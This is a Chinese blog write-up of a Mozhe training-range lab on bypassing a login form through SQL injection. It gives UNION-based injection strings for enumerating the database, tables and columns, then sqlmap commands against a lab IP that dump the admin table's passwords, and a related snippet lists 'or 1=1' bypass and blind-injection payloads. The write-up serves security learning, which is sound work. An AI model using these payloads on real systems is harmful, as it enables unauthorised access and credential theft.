SQL注入网站后台登录绕过(墨者靶场)

最新推荐文章于 2024-05-07 20:00:00 发布
最新推荐文章于 2024-05-07 20:00:00 发布
阅读量2.2k 收藏 21
点赞数 3
文章标签: sql 安全漏洞 web安全 安全 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/FreyZzz/article/details/120734390
版权

靶场地址:SQL注入漏洞测试(登录绕过)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养

一、手工注入

通过网站URL地址判断不存在id=x等可传参数,此网站不采用GET方式传参。

brup抓包

由此可判断为POST传参

 加入单引号判断,网页报错,存在注入点

注入语句

username=admin' and 1=2 union select 1,2,3,4 --+

//爆库
username=admin' and 1=2 union select 1,2,3,database() --+
//数据库 purchase

Mysql5.0以上高版本自带数据库information_schema

注入语句爆表名:

username=admin' and 1=2 union select 1,2,3,table_name from information_schema.tables where table_schema = 'purchase'--+&password=admin

 爆列名:

username=admin' and 1=2 union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name = 'admin'--+&password=admin

最后再查密码:

 二、SQLMAP工具注入

SQLMAP测试语句:

sqlmap.py -u  http://219.153.49.228:46621/login.php --data "username=admin&password=admin"

--data 表示采用POST传参,后面跟上可传参数

成功,存在注入点

查询当前数据库:

sqlmap.py -u  http://219.153.49.228:46621/login.php --data "username=admin&password=admin" --current-db

purchase 数据库下的所有表名:

sqlmap.py -u  http://219.153.49.228:46621/login.php --data "username=admin&password=admin" --tables -D "purchase"

--tables -D "数据库名"     -D —> Databse

admin表下所有列名:

sqlmap.py -u  http://219.153.49.228:46621/login.php --data "username=admin&password=admin" --column -T "admin" -D "purchase"

--column -T "admin" -D "数据库名"     -T —> Table

 查询所有列名数据:

sqlmap.py -u  http://219.153.49.228:46621/login.php --data "username=admin&password=admin" --dump -C "id,password,thekey,username" -T "admin" -D "purchase"

柯北Sec
关注
  • 3
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
利用SQL注入漏洞登录后台的实现方法
12-15
早在02年,国外关于SQL注入漏洞的技术文章已经很多,而国内在05年左右才开始的。   如今,谈SQL注入漏洞是否已是明日黄花,国内大大小小的网站都已经补上漏洞。但,百密必有一疏,入侵是偶然的,但安全绝对不是必然的。   前些天,网上传得沸沸扬扬的“拖库”事件给我们敲响了安全警钟。   在开发网站的时候,出于安全考虑,需要过滤从页面传递过来的字符。通常,用户可以通过以下接口调用数据库的内容:URL地址栏、登陆界面、留言板、搜索框等。这往往给骇客留下了可乘之机。轻则数据遭到泄露,重则服务器被拿下。 现在,很多网站开发人员知其然而不知其所以然,小弟也是,所以赶紧恶补下,总结如学习内容。希望对初学者
WEB常见漏洞之SQL注入靶场篇—1)
One-Fox安全团队的博客
05-05 3822
sqli靶场SqliLabs 是一个学习 SQL 注入靶场,它提供了 GET 和 POST 的实验场景,涵盖了联合查询注入、基于报错的注入、基于时间的盲注、基于布尔的盲注、堆叠注入、二次注入以及各种注入绕过
利用SQL注入漏洞到登录后台
白帽黑客鹏哥的博客
05-07 1410
日前,国内最大的程序员社区CSDN网站的用户数据库被黑客公开发布,600万用户的登录名及密码被公开泄露,随后又有多家网站的用户密码被流传于网络,连日来引发众多网民对自己账号、密码等互联网信息被盗取的普遍担忧。网络安全成为了现在互联网的焦点,这也恰恰触动了每一位用户的神经,由于设计的漏洞导致了不可收拾的恶果,验证了一句话“出来混的,迟早是要还的”,所以我想通过专题博文介绍一些常用的攻击技术和防范策略。
SQL注入原理及思路(绕过)-超详细
weixin_52501704的博客
05-17 2968
(1)user() 返回当前使用数据库的用户,也就是网站配置文件中连接数据库的账号 (2)version() 返回当前数据库的版本 (3)database() 返回当前使用的数据库,只有在use命令选择一个数据库之后,才能查到 (4)group_concat() 把数据库中的某列数据或某几列数据合并为一个字符串 (5)@@datadir 数据库路径 (6)@@version_compile_os 操作系统版本。通过+1、-1、and 1=1、and 1=2、注释符。或者通过报错注入是网页返回报错信息。
SQL注入绕过登陆界面
weixin_73094474的博客
03-06 2358
【代码】SQL注入绕过登陆界面。
SQL注入漏洞测试(登录绕过)
weixin_47493074的博客
10-05 1127
SQL注入漏洞测试(登录绕过)
sql注入绕过密码登录详解
qq_40800734的博客
03-22 5635
一.环境 关键源码:$qry="SELECT*FROM`users`WHEREuser='$user'ANDpassword='$pass';"; 用户名是admin;密码是password 二.绕过密码登录 1.构造admin' or '1' ='1(当然是用admin'# 用#号注释掉后面的语句也可以) 传入后变成 select * from 'u...
墨者靶场 post ,DB2,绕过登录sql注入四关
最新发布
07-22
通关攻略墨者靶场 post ,DB2,绕过登录sql注入四关
spring IOC实现(墨者革离)
12-12
在这个名为"spring_IOC实现(墨者革离)"的项目中,我们可以通过模拟城门叩问的编剧场景来理解这一概念。 首先,控制反转的基本思想是将对象的创建和依赖关系的管理从应用程序中分离出来,交给一个外部容器(在...
墨者未必黑.pdf
12-26
墨者未必黑.pdf
墨者安全专家 v3.7.2.9
03-12
墨者安全专家第二代为您彻底免疫未知病毒,并且提供终身免费国际杀毒品牌趋势科技的优质产品! 墨者安全专家第二代是融合了反rootkit技术、用户权限管理技术和白名单技术并有机集成的免疫"革离"技术。同时第二代集...
墨者未必黑——思想汇报 .docx
02-10
墨者未必黑——思想汇报 .docx
Vulnhub_CengBox
weixin_44193247的博客
11-09 4162
Vulnhub_CengBox
web渗透测试之攻破登录页面
qq_42801460的博客
03-30 5922
有些图形验证码加入的像素线条过于简单,使用图形验证码识别工具可以识别出每次更换的验证码,在平常的漏洞挖掘过程中,如果我们发现登录的验证码非常简单且易于识别,那我们就可以尝试使用自动化工具来进行登录破解了,如 PKAV 的 HTTP Fuzzer。当我们在做渗透测试时,无论厂商项目还是src众测项目,都会遇到给一堆登录系统的URL,然后让我们自己去测,能不能进去全看天的状况,本文将讲一下怎么突破这种封闭的web系统,从而进行更深层次的渗透 ,学完后你会发现,其实你就是系统管理员。
SQL注入中万能密码的原理详解
Yuppie001的博客
11-26 2138
2.然后再通过#将后面的password注释掉,这样整个查询条件为真,相当于where条件没了,查询整个字段的数据。注:在现在的应用程序已经很难用万能密码进行绕过了,本篇文章仅仅讨论万能密码绕过的原理。我们直接使用万能密码:admin’ or 1=1 #进行绕过,密码随便输。1.用户通过表单输入用户名和密码,并且该表单通过POST方法提交到服务器。由于本次只讲解万能密码的原理,后面的步骤就不具体演示了。具体的原理知道了,你也来构造一个万能密码把!可以发现需要登录用户名和密码来进行登录
SQL 注入基础系列2——利用 SQL 漏洞绕过登录验证
weixin_37537965的博客
12-26 767
DVWA->SQL Injection //后台sql语句 select * from users where username='$name' and password='$pwd'; 当查询到数据表中存在同时满足 username 和 password 字段的数据时,会返回登录成功。例如,用户名为admin,密码为123时: //实际执行语句 select * from use...
SQL注入绕过(passby)策略
Megumiwind的博客
08-09 1430
例题:[极客大挑战 2019]BabySQL1 首先输入万能密码进行尝试:' or '1'='1-- -,发现回显是错误用户名和密码,说明没有注入成功,然后输入在用户名处输入1'发现报错。 根据报错信息推断出闭合的条件就是单引号',所以继续在用户名处输入1'-- -,密码:1(一下密码不做特殊声明外均为1)进一步验证判断是否正确。 ...
SQL注入 | 黑客入门篇(如何绕过密码登陆账号)
weixin_44328211的博客
05-23 8105
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
常见 SQL 注入绕过方法
Flag少侠的博客
04-25 1572
Web应用通常会使用输入过滤器,设计这些过滤器的目的是防御包括SOL 注入在内的常见攻击。这些过滤器可能位于应用的代码中(自定义输入验证方式),也可能在应用外部实现,形式为 Web应用防火墙(WAF)或入侵防御系统(IPS)
墨者靶场sql布尔盲注
10-09
针对墨者靶场SQL 布尔盲注,你需要先了解 SQL 注入的基本概念和实现方式。在进行布尔盲注时,需要通过构造特定的 SQL 语句来判断数据库中是否存在某些数据或条件,从而实现注入攻击。以下是一些可能用到的注入语句: 1. 判断存在性:SELECT * FROM table WHERE column = 'value' and 1=1(存在)或 1=2(不存在) 2. 判断字段长度:SELECT * FROM table WHERE LENGTH(column) = n and 1=1(长度为 n)或 1=2(长度不为 n) 3. 判断字符内容:SELECT * FROM table WHERE ASCII(SUBSTRING(column, n, 1)) = c and 1=1(第 n 个字符的 ASCII 码为 c)或 1=2(第 n 个字符的 ASCII 码不为 c) 在使用布尔盲注时,需要不断地尝试不同的语句,并根据返回结果进行判断和推断。同时,需要注意防止误伤和误判,以免造成不必要的影响和损失。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值